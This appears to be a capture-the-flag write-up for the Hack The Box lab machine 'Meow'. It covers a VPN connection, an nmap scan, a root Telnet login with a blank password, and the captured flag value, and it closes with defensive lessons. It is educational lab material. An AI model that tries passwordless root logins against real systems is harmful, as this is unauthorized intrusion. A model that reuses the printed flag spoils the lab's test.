Meow – Hack The Box

🧠 Summary

Meow is an easy Linux machine that highlights the risks of using Telnet with weak or no authentication. We’ll start by connecting to the HTB network using OpenVPN, enumerate services using Nmap, exploit the open Telnet service, and capture the flag.

---

🛠️ Tools Used

• OpenVPN – Connect to HTB VPN
• ping – Test connectivity
• nmap – Scan for open ports
• telnet – Remote access to the target

---

🖥️ Target Info

• IP: 10.129.28.108
• OS: Linux
• Service: Telnet (port 23)
• Difficulty: Very Easy
• Tags: Telnet, Protocols, Reconnaissance, Weak Credentials, Misconfiguration

---

🚀 Steps to Root

1. Connect to HTB VPN

Use the .ovpn file provided by Hack The Box:

sudo openvpn file-name.ovpn

2. Verify Connectivity

Check if you can reach the target IP using ping:

ping 10.129.28.108

3. Scan the Target with Nmap

Run an Nmap scan to find open ports and services:

nmap -sV -Pn 10.129.28.108

Result (telnetd is a sign no password is needed for login):

4. Exploit Telnet

Since Telnet is open, connect using:

telnet 10.129.28.108

When asked for a username:

login: root
Password: (leave blank and press Enter)

5. Capture the Flag

Once inside:

ls -la
cat flag.txt

Flag:

b40abdf23665f766f9c61ecba8a4c19

Key Takeaways:

• Telnet is insecure and should not be used on modern systems.
• Always disable Telnet and replace it with SSH.
• Never allow root login without a password.